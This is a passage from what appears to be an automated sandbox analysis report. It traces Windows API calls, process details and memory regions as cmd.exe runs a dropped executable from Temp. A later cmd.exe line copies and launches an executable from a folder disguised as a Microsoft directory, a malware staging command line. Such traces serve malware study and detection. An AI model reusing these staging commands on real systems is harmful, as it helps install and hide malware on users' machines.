lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.391] _close (_FileHandle=4) returned 0 [0094.391] FindNextFileW (in: hFindFile=0x230f58, lpFindFileData=0x20f510 | out: lpFindFileData=0x20f510) returned 0 [0094.392] GetLastError () returned 0x12 [0094.392] FindClose (in: hFindFile=0x230f58 | out: hFindFile=0x230f58) returned 1 [0094.392] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0094.394] _close (_FileHandle=3) returned 0 [0094.395] GetConsoleTitleW (in: lpConsoleTitle=0x20f9ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.395] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe\"")) returned 0xffffffff [0094.395] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0094.395] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0094.395] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0094.395] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0094.395] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0094.395] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0094.395] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0094.395] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0094.395] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0094.395] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0094.395] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0094.395] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0094.395] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0094.395] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0094.395] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0094.395] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0094.395] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0094.395] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0094.395] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0094.395] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0094.395] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0094.395] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0094.395] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0094.395] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0094.395] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0094.395] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0094.396] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0094.396] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0094.396] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0094.396] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0094.396] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0094.396] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0094.396] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0094.396] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0094.396] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0094.396] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0094.396] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0094.396] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0094.396] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0094.396] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0094.396] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0094.396] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0094.396] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0094.396] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0094.396] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0094.396] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0094.396] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0094.396] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0094.396] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0094.396] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0094.396] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0094.396] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0094.396] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0094.396] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0094.396] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0094.396] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0094.396] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0094.396] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0094.396] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0094.396] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0094.396] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0094.396] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0094.396] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0094.396] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0094.396] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0094.396] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0094.397] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0094.397] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0094.397] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0094.397] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0094.397] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0094.397] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0094.397] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0094.397] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0094.397] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0094.397] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0094.397] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0094.397] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0094.397] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0094.397] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0094.397] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0094.397] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0094.397] SetErrorMode (uMode=0x0) returned 0x0 [0094.397] SetErrorMode (uMode=0x1) returned 0x0 [0094.397] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x240498, lpFilePart=0x20f4cc | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x20f4cc*="Temp") returned 0x23 [0094.397] SetErrorMode (uMode=0x0) returned 0x1 [0094.397] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0094.398] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.400] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.400] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", fInfoLevelId=0x1, lpFindFileData=0x20f268, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20f268) returned 0x230f58 [0094.400] FindClose (in: hFindFile=0x230f58 | out: hFindFile=0x230f58) returned 1 [0094.401] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0094.401] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0094.401] GetConsoleTitleW (in: lpConsoleTitle=0x20f740, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.401] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f5c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f690 | out: lpAttributeList=0x20f5c8, lpSize=0x20f690) returned 1 [0094.401] UpdateProcThreadAttribute (in: lpAttributeList=0x20f5c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f688, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f5c8, lpPreviousValue=0x0) returned 1 [0094.401] GetStartupInfoW (in: lpStartupInfo=0x20f584 | out: lpStartupInfo=0x20f584*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0094.402] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0094.402] lstrcmpW (lpString1="\\yAQb5Zg8.exe", lpString2="\\XCOPY.EXE") returned 1 [0094.402] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f624*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f670 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessInformation=0x20f670*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb58, dwThreadId=0xb5c)) returned 1 [0095.644] CloseHandle (hObject=0x4c) returned 1 [0095.644] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0095.644] GetEnvironmentStringsW () returned 0x242ce0* [0095.644] FreeEnvironmentStringsW (penv=0x242ce0) returned 1 [0095.644] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0098.180] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f564 | out: lpExitCode=0x20f564*=0x0) returned 1 [0098.180] CloseHandle (hObject=0x50) returned 1 [0098.180] _vsnwprintf (in: _Buffer=0x20f6ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f570 | out: _Buffer="00000000") returned 8 [0098.180] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0098.180] GetEnvironmentStringsW () returned 0x2424c0* [0098.180] FreeEnvironmentStringsW (penv=0x2424c0) returned 1 [0098.180] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0098.180] GetEnvironmentStringsW () returned 0x2424c0* [0098.180] FreeEnvironmentStringsW (penv=0x2424c0) returned 1 [0098.180] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f5c8 | out: lpAttributeList=0x20f5c8) [0098.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.181] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0098.181] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.181] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0098.181] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.181] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0098.181] SetConsoleInputExeNameW () returned 0x1 [0098.181] GetConsoleOutputCP () returned 0x1b5 [0098.181] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0098.181] SetThreadUILanguage (LangId=0x0) returned 0x409 [0098.181] exit (_Code=0) Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167c0" os_pid = "0xb34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 856 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 857 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 858 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 859 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 860 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 861 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 862 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 863 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 864 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 865 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1050 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1051 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1052 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1053 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1054 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1055 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1056 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1057 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1058 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1059 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1060 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1061 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1062 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1063 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1064 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 1065 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1066 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1067 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1068 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1069 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1070 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1071 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1072 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 1073 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 1171 start_va = 0x1340000 end_va = 0x160efff entry_point = 0x1340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1293 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "lsfkrhur.exe" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe") Thread: id = 13 os_tid = 0xb38 [0096.220] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8bc | out: lpSystemTimeAsFileTime=0x18f8bc*(dwLowDateTime=0x779e9800, dwHighDateTime=0x1d440a9)) [0096.220] GetCurrentProcessId () returned 0xb34 [0096.220] GetCurrentThreadId () returned 0xb38 [0096.220] GetTickCount () returned 0x2312d [0096.220] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8b4 | out: lpPerformanceCount=0x18f8b4*=15300914678) returned 1 [0096.220] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0096.220] __set_app_type (_Type=0x1) [0096.220] __p__fmode () returned 0x76b331f4 [0096.221] __p__commode () returned 0x76b331fc [0096.221] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0096.221] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0096.221] GetCurrentThreadId () returned 0xb38 [0096.221] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb38) returned 0x38 [0096.221] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0096.221] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0096.221] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.221] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0096.221] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f84c | out: phkResult=0x18f84c*=0x0) returned 0x2 [0096.221] VirtualQuery (in: lpAddress=0x18f883, lpBuffer=0x18f81c, dwLength=0x1c | out: lpBuffer=0x18f81c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0096.221] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f81c, dwLength=0x1c | out: lpBuffer=0x18f81c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0096.221] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f81c, dwLength=0x1c | out: lpBuffer=0x18f81c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0096.221] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f81c, dwLength=0x1c | out: lpBuffer=0x18f81c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0096.221] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f81c, dwLength=0x1c | out: lpBuffer=0x18f81c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x11000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0096.221] GetConsoleOutputCP () returned 0x1b5 [0096.221] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0096.222] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0096.222] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.222] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0096.222] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.222] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0096.222] _get_osfhandle (_FileHandle=1) returned 